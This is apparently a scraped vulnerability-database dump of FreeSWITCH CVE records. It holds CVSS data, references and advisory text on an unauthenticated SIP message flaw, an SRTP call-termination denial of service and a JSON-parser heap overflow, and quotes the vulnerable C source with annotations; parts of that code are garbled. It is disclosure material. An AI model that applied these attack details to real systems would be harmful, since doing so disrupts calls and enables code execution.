"url": "https://github.com/live-hack-cve/cve-2021-37624 "
},
{
"title": "PewSWITCH",
"trust": 0.1,
"url": "https://github.com/0xinfection/pewswitch "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/soosmile/poc "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-287",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/164628/freeswitch-1.10.6-missing-sip-message-authentication.html"
},
{
"trust": 1.9,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-mjcm-q9h8-9xv3"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2021/oct/44"
},
{
"trust": 1.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2021/10/25/6"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37624"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-37624"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/0xinfection/pewswitch"
},
{
"trust": 0.1,
"url": "https://github.com/enablesecurity/vulnerability-disclosure-policy\u003e."
},
{
"trust": 0.1,
"url": "https://www.enablesecurity.com)"
},
{
"trust": 0.1,
"url": "https://github.com/enablesecurity/advisories/tree/master/es2021-07-freeswitch-sip-message-without-auth"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-25T00:00:00",
"db": "VULHUB",
"id": "VHN-397859"
},
{
"date": "2021-10-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"date": "2022-09-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"date": "2021-10-25T17:12:16",
"db": "PACKETSTORM",
"id": "164628"
},
{
"date": "2021-10-25T16:15:08.263000",
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-27T00:00:00",
"db": "VULHUB",
"id": "VHN-397859"
},
{
"date": "2022-10-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"date": "2022-09-29T07:20:00",
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"date": "2022-10-27T16:36:33.607000",
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"date": "2022-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
],
"trust": 0.6
}
}
VAR-202110-1256
Vulnerability from variot - Updated: 2023-12-18 13:42FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file switch_rtp.c, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network. This issue is patched in version 1.10.7. FreeSWITCH Exists in unspecified vulnerabilities.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. FreeSWITCH has an input validation error vulnerability, which arises from network systems or products that do not adequately verify the origin or authenticity of data. Attackers can use forged data to attack. [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1256",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.7"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41105"
}
]
},
"cve": "CVE-2021-41105",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-41105",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-397851",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-013900",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-41105",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-41105",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-41105",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1799",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-397851",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397851"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7. FreeSWITCH Exists in unspecified vulnerabilities.Service operation interruption (DoS) It may be in a state. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. FreeSWITCH has an input validation error vulnerability, which arises from network systems or products that do not adequately verify the origin or authenticity of data. Attackers can use forged data to attack. [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "VULHUB",
"id": "VHN-397851"
},
{
"db": "VULMON",
"id": "CVE-2021-41105"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-41105",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164639",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397851",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-41105",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397851"
},
{
"db": "VULMON",
"id": "CVE-2021-41105"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"id": "VAR-202110-1256",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397851"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:42:24.100000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0v1.10.7\u00a0Release GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"title": "FreeSWITCH Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=168735"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "others (CWE-Other) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-jh42-prph-gp36"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2021/oct/43"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41105"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164639/freeswitch-1.10.6-srtp-packet-denial-of-service.html"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q4/52"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397851"
},
{
"db": "VULMON",
"id": "CVE-2021-41105"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397851"
},
{
"db": "VULMON",
"id": "CVE-2021-41105"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-25T00:00:00",
"db": "VULHUB",
"id": "VHN-397851"
},
{
"date": "2022-09-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"date": "2021-10-25T22:15:07.710000",
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-397851"
},
{
"date": "2022-09-29T06:36:00",
"db": "JVNDB",
"id": "JVNDB-2021-013900"
},
{
"date": "2022-08-12T14:48:08.967000",
"db": "NVD",
"id": "CVE-2021-41105"
},
{
"date": "2022-08-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013900"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1799"
}
],
"trust": 0.6
}
}
VAR-201510-0226
Vulnerability from variot - Updated: 2023-12-18 13:39Heap-based buffer overflow in the parse_string function in libs/esl/src/esl_json.c in FreeSWITCH before 1.4.23 and 1.6.x before 1.6.2 allows remote attackers to execute arbitrary code via a trailing \u in a json string to cJSON_Parse. FreeSWITCH is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. A remote attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause a denial-of-service condition. Versions prior to FreeSWITCH 1.6.2 and 1.4.23 are vulnerable. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. There is a heap-based buffer overflow vulnerability in the 'parse_string' function in the libs/esl/src/esl_json.c file of FreeSWITCH 1.4.21 and earlier versions and 1.6.0. The vulnerability stems from the fact that the cJSON_Parse structure does not sufficiently filter' json' character at the end of the string. 1. Advisory Information
Title: Heap overflow in freeswitch json parser < 1.6.2 & < 1.4.23 Submitter: Marcello Duarte (marcello@cybersightgroup.com) Product: freeswitch Product URL: http://freeswitch.org Affected Versions: freeswitch < 1.6.2 & < 1.4.23 Fixed Versions: 1.6.2 , 1.4.23 Link to source code diff: https://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/cf892528a1a107ed6eb67fb98ed22533e27778fd CVE Status: CVE-2015-7392
- Vulnerability Information
Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No
- Vulnerability Description
Product Information: FreeSWITCH is a scalable open source cross-platform telephony platform designed to route and interconnect popular communication protocols using audio, video, text or any other form of media. It was created in 2006 to fill the void left by proprietary commercial solutions. FreeSWITCH also provides a stable telephony platform on which many applications can be developed using a wide range of free tools.
Vulnerability:
A carefully crafted json string supplied to cJSON_Parse will trigger a heap overflow with user controlled data.
The underlying vulnerability occurs in the parse_string function.
This confuses the code responsible for copying the string. Since it doesn't detect the NULL in this situation, it will keep copying until it hits a null in memory. This leads to a heap overflow with user controlled data.
Any modules or core code which allows user supplied json to enter the json parser will be vulnerable.
Vulnerable Source Code:
static const char parse_string(cJSON item, const char *str) {
...
/ HACKLOG The length of string is determined here, it will stop counting when it hits a null /
while (ptr != '\"' && ptr && ++len) if (ptr++ == '\') ptr++; / Skip escaped quotes. */
/ HACKLOG The buffer is alloced with the length obtained from the previous section /
out = (char )cJSON_malloc( len + 1); / This is how long we need for the string, roughly. */ if (!out) return 0;
/ HACKLOG the following code will copy the string into the alloced buffer taking into account utf16 to utf8 conversion /
ptr = str + 1; ptr2 = out; / 1 / while (ptr != '\"' && ptr) { if (ptr != '\') ptr2++ = ptr++; else { ptr++; switch (ptr) { case 'b': ptr2++ = '\b'; break; case 'f': ptr2++ = '\f'; break; case 'n': ptr2++ = '\n'; break; case 'r': ptr2++ = '\r'; break; case 't': ptr2++ = '\t'; break; case 'u': / transcode utf16 to utf8. */ if (sscanf(ptr + 1, "%4x", &uc) < 1) break;
ptr += 4; /* get the unicode char. */
if ((uc >= 0xDC00 && uc <= 0xDFFF) || uc == 0)
break; // check for invalid.
if (uc >= 0xD800 && uc <= 0xDBFF) // UTF16 surrogate pairs.
{
if (ptr[1] != '\\' || ptr[2] != 'u')
break; // missing second-half of surrogate.
if (sscanf(ptr + 3, "%4x", &uc2) < 1)
break;
ptr += 6;
if (uc2 < 0xDC00 || uc2 > 0xDFFF)
break; // invalid second-half of surrogate.
uc = 0x10000 | ((uc & 0x3FF) << 10) | (uc2 & 0x3FF);
}
len = 4;
if (uc < 0x80)
len = 1;
else if (uc < 0x800)
len = 2;
else if (uc < 0x10000)
len = 3;
ptr2 += len;
switch (len) {
case 4:
*--ptr2 = ((uc | 0x80) & 0xBF);
uc >>= 6;
case 3:
*--ptr2 = ((uc | 0x80) & 0xBF);
uc >>= 6;
case 2:
*--ptr2 = ((uc | 0x80) & 0xBF);
uc >>= 6;
case 1:
*--ptr2 = (char)(uc | firstByteMark[len]);
}
ptr2 += len;
break;
default:
*ptr2++ = *ptr;
break;
}
/* HACKLOG INCREMENTS past null here, causing the while loop to
not detect the end of the buffer so it keeps copying past the end of the alloced buffer */ ptr++; }
- Vendor Information, Solutions
Freeswitch has released versions 1.6.2 , 1.4.23 which fix the issue.
- Credits
This vulnerability was discovered and researched by Marcello Duarte ( marcello@cybersightgroup.com ) from CYBERSIGHT GROUP Vulnerability Research Labs.
-
Report Timeline 2015-09-02 - Vulnerability found 2015-09-13 - Freeswitch developers contacted 2015-09-14 - Freeswitch developers verified bug and patched in master 2015-09-25 - Freeswitch releases fixed packages. 2015-09-20 - CVE requested 2015-09-29 - CVE issued, Advisory released
-
About CYBERSIGHT GROUP
CYBERSIGHT GROUP is an organization of security professionals specializing in several areas of offensive computer security research. We specialize in vulnerability research, exploit development, reverse engineering and cyber attack planning. http://cybersightgroup.com , contact@cybersightgroup.com
- Disclaimer
The information provided in the advisory is provided as is without any warranty. CYBERSIGHT GROUP and it's members are not liable in any case of damage, direct or indirect. Permission to redistribute the advisory in it's unmodified form is granted.
-- Marcello Duarte Chief Research Officer CYBERSIGHT GROUP
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201510-0226",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "eq",
"trust": 1.6,
"vendor": "freeswitch",
"version": "1.6.0"
},
{
"model": "freeswitch",
"scope": "lte",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.4.21"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.6.2"
},
{
"model": "freeswitch",
"scope": "lt",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.6.x"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.6,
"vendor": "freeswitch",
"version": "1.4.21"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.3,
"vendor": "freeswitch",
"version": "1.6"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.3,
"vendor": "freeswitch",
"version": "1.4"
},
{
"model": "freeswitch",
"scope": "ne",
"trust": 0.3,
"vendor": "freeswitch",
"version": "1.6.2"
},
{
"model": "freeswitch",
"scope": "ne",
"trust": 0.3,
"vendor": "freeswitch",
"version": "1.4.23"
}
],
"sources": [
{
"db": "BID",
"id": "76976"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
